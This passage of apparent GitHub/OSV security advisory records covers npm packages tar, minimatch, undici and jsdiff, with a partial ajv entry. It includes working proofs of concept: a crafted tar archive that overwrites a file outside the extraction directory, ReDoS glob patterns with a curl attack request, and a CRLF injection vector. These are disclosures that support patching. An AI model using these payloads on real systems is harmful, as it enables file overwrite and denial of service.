    {
      "type": "WEB",
      "url": "https://github.com/kpdecker/jsdiff/pull/649"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kpdecker/jsdiff"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.9"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T00:52:32Z",
    "nvd_published_at": "2026-03-07T16:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots.\n\nWhat happens with `linkpath: \"C:../target.txt\"`:\n1. Split on `/` gives `[\u0027C:..\u0027, \u0027target.txt\u0027]`, so `parts.includes(\u0027..\u0027)` is false.\n2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`.\n3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up.\n4. Writing through the extracted hardlink overwrites the outside file.\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.9`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require(\u0027fs\u0027)\nconst path = require(\u0027path\u0027)\nconst { Header, x } = require(\u0027tar\u0027)\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, \u0027..\u0027, \u0027target.txt\u0027)\nconst tarFile = path.join(process.cwd(), \u0027poc.tar\u0027)\n\nfs.writeFileSync(target, \u0027ORIGINAL\\n\u0027)\n\nconst b = Buffer.alloc(1536)\nnew Header({ path: \u0027l\u0027, type: \u0027Link\u0027, linkpath: \u0027C:../target.txt\u0027 }).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() =\u003e {\n  fs.writeFileSync(path.join(cwd, \u0027l\u0027), \u0027PWNED\\n\u0027)\n  process.stdout.write(fs.readFileSync(target, \u0027utf8\u0027))\n})\n```\n\nRun:\n\n```bash\ncd test-workspace\nnode poc.cjs \u0026\u0026 ls -l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files",
  "id": "GHSA-qffp-2rhf-9h96",
  "modified": "2026-03-09T15:49:59Z",
  "published": "2026-03-05T00:52:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "tar has Hardlink Path Traversal via Drive-Relative Linkpath"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27903"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-407"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T22:10:18Z",
    "nvd_published_at": "2026-02-26T02:16:21Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.\n\n---\n\n### Details\n\nThe vulnerable loop is in `matchOne()` at [`src/index.ts#L960`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/index.ts#L960):\n\n```typescript\nwhile (fr \u003c fl) {\n  ..\n  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {\n    ..\n    return true\n  }\n  ..\n  fr++\n}\n```\n\nWhen a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each `**` multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).\n\nThere is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning `false` on a non-matching input.\n\nMeasured timing with n=30 path segments:\n\n| k (globstars) | Pattern size | Time     |\n|---------------|--------------|----------|\n| 7             | 36 bytes     | ~154ms   |\n| 9             | 46 bytes     | ~1.2s    |\n| 11            | 56 bytes     | ~5.4s    |\n| 12            | 61 bytes     | ~9.7s    |\n| 13            | 66 bytes     | ~15.9s   |\n\n---\n\n### PoC\n\nTested on minimatch@10.2.2, Node.js 20.\n\n**Step 1 -- inline script**\n\n```javascript\nimport { minimatch } from \u0027minimatch\u0027\n\n// k=9 globstars, n=30 path segments\n// pattern: 46 bytes, default options\nconst pattern = \u0027**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b\u0027\nconst path    = \u0027a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a\u0027\n\nconst start = Date.now()\nminimatch(path, pattern)\nconsole.log(Date.now() - start + \u0027ms\u0027) // ~1200ms\n```\n\nTo scale the effect, increase k:\n\n```javascript\n// k=11 -\u003e ~5.4s, k=13 -\u003e ~15.9s\nconst k = 11\nconst pattern = Array.from({ length: k }, () =\u003e \u0027**/a\u0027).join(\u0027/\u0027) + \u0027/b\u0027\nconst path    = Array(30).fill(\u0027a\u0027).join(\u0027/\u0027)\nminimatch(path, pattern)\n```\n\nNo special options are required. This reproduces with the default `minimatch()` call.\n\n**Step 2 -- HTTP server (event loop starvation proof)**\n\nThe following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:\n\n```javascript\n// poc1-server.mjs\nimport http from \u0027node:http\u0027\nimport { URL } from \u0027node:url\u0027\nimport { minimatch } from \u0027minimatch\u0027\n\nconst PORT = 3000\n\nconst server = http.createServer((req, res) =\u003e {\n  const url = new URL(req.url, `http://localhost:${PORT}`)\n  if (url.pathname !== \u0027/match\u0027) { res.writeHead(404); res.end(); return }\n\n  const pattern = url.searchParams.get(\u0027pattern\u0027) ?? \u0027\u0027\n  const path    = url.searchParams.get(\u0027path\u0027) ?? \u0027\u0027\n\n  const start  = process.hrtime.bigint()\n  const result = minimatch(path, pattern)\n  const ms     = Number(process.hrtime.bigint() - start) / 1e6\n\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 })\n  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + \u0027\\n\u0027)\n})\n\nserver.listen(PORT)\n```\n\nTerminal 1 -- start the server:\n```\nnode poc1-server.mjs\n```\n\nTerminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:\n```\ncurl \"http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb\u0026path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa\" \u0026\n```\n\nTerminal 3 -- while the attack is in-flight, send a benign request:\n```\ncurl -w \"\\ntime_total: %{time_total}s\\n\" \"http://localhost:3000/match?pattern=**%2Fy%2Fz\u0026path=x%2Fy%2Fz\"\n```\n\n**Observed output (Terminal 3):**\n```\n{\"result\":true,\"ms\":\"0\"}\n\ntime_total: 4.132709s\n```\n\nThe server reports `\"ms\":\"0\"` -- the legitimate request itself takes zero processing time. The 4+ second `time_total` is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:\n\n```\n{\"result\":true,\"ms\":\"0\"}\n\ntime_total: 0.001599s\n```\n\n---\n\n### Impact\n\nAny application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.",
  "id": "GHSA-7r86-cg39-jmmj",
  "modified": "2026-02-26T22:10:18Z",
  "published": "2026-02-26T22:10:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27903"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/minimatch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26960"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T00:57:13Z",
    "nvd_published_at": "2026-02-20T02:16:53Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`tar.extract()` in Node `tar` allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options.\n\nThis enables **arbitrary file read and write** as the extracting user (no root, no chmod, no `preservePaths`).\n\nSeverity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.\n\n### Details\nThe bypass chain uses two symlinks plus one hardlink:\n\n1. `a/b/c/up -\u003e ../..`\n2. `a/b/escape -\u003e c/up/../..`\n3. `exfil` (hardlink) -\u003e `a/b/escape/\u003ctarget-relative-to-parent-of-extract\u003e`\n\nWhy this works:\n\n- Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.\n  - See `STRIPABSOLUTEPATH` logic in:\n    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255`\n    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268`\n    - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281`\n\n- Hardlink extraction resolves target as `path.resolve(cwd, entry.linkpath)` and then calls `fs.link(target, destination)`.\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566`\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567`\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703`\n\n- Parent directory safety checks (`mkdir` + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617`\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619`\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27`\n  - `../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101`\n\nAs a result, `exfil` is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via `exfil`.\n\n### PoC\n[hardlink.js](https://github.com/user-attachments/files/25240082/hardlink.js)\nEnvironment used for validation:\n\n- Node: `v25.4.0`\n- tar: `7.5.7`\n- OS: macOS Darwin 25.2.0\n- Extract options: defaults (`tar.extract({ file, cwd })`)\n\nSteps:\n\n1. Prepare/locate a `tar` module. If `require(\u0027tar\u0027)` is not available locally, set `TAR_MODULE` to an absolute path to a tar package directory.\n\n2. Run:\n\n```bash\nTAR_MODULE=\"$(cd \u0027../tar-audit-setuid - CVE/node_modules/tar\u0027 \u0026\u0026 pwd)\" node hardlink.js\n```\n\n3. Expected vulnerable output (key lines):\n\n```text\nsame_inode=true\nread_ok=true\nwrite_ok=true\nresult=VULNERABLE\n```\n\nInterpretation:\n\n- `same_inode=true`: extracted `exfil` and external secret are the same file object.\n- `read_ok=true`: reading `exfil` leaks external content.\n- `write_ok=true`: writing `exfil` modifies external file.\n\n### Impact\nVulnerability type:\n\n- Arbitrary file read/write via archive extraction path confusion and link resolution.\n\nWho is impacted:\n\n- Any application/service that extracts attacker-controlled tar archives with Node `tar` defaults.\n- Impact scope is the privileges of the extracting process user.\n\nPotential outcomes:\n\n- Read sensitive files reachable by the process user.\n- Overwrite writable files outside extraction root.\n- Escalate impact depending on deployment context (keys, configs, scripts, app data).",
  "id": "GHSA-83g3-92jg-28cx",
  "modified": "2026-02-20T16:47:48Z",
  "published": "2026-02-18T00:57:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26996"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:38:11Z",
    "nvd_published_at": "2026-02-20T03:16:01Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn\u0027t appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8\u0027s regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn\u0027t contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) \u2014 exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input\n\n----\n\nThanks to @ljharb for back-porting the fix to legacy versions of minimatch.",
  "id": "GHSA-3ppc-4f35-3m26",
  "modified": "2026-02-24T20:59:57Z",
  "published": "2026-02-18T22:38:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/minimatch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1528"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-248"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:07:26Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici\u0027s ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
  "id": "GHSA-f269-vfmq-vjvj",
  "modified": "2026-03-13T20:07:26Z",
  "published": "2026-03-13T20:07:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1528"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3537648"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1527"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:41:26Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n  header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n  if (/[\\r\\n]/.test(value)) {\n    throw new Error(\u0027Invalid upgrade value\u0027)\n  }\n  return value\n}\n\nclient.request({\n  upgrade: sanitizeUpgrade(userInput)\n})\n```",
  "id": "GHSA-4992-7rv2-5pvq",
  "modified": "2026-03-13T20:41:26Z",
  "published": "2026-03-13T20:41:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1527"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3487198"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has CRLF Injection in undici via `upgrade` option"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.17.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2581"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:37:58Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "MODERATE"
  },
  "details": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
  "id": "GHSA-phc3-fgpg-7m6h",
  "modified": "2026-03-13T20:37:58Z",
  "published": "2026-03-13T20:37:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3513473"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "ajv"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0-alpha.0"
            },
            {
              "fixed": "8.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "ajv"
      },
      "ranges": [
        {
          "events": [
            {
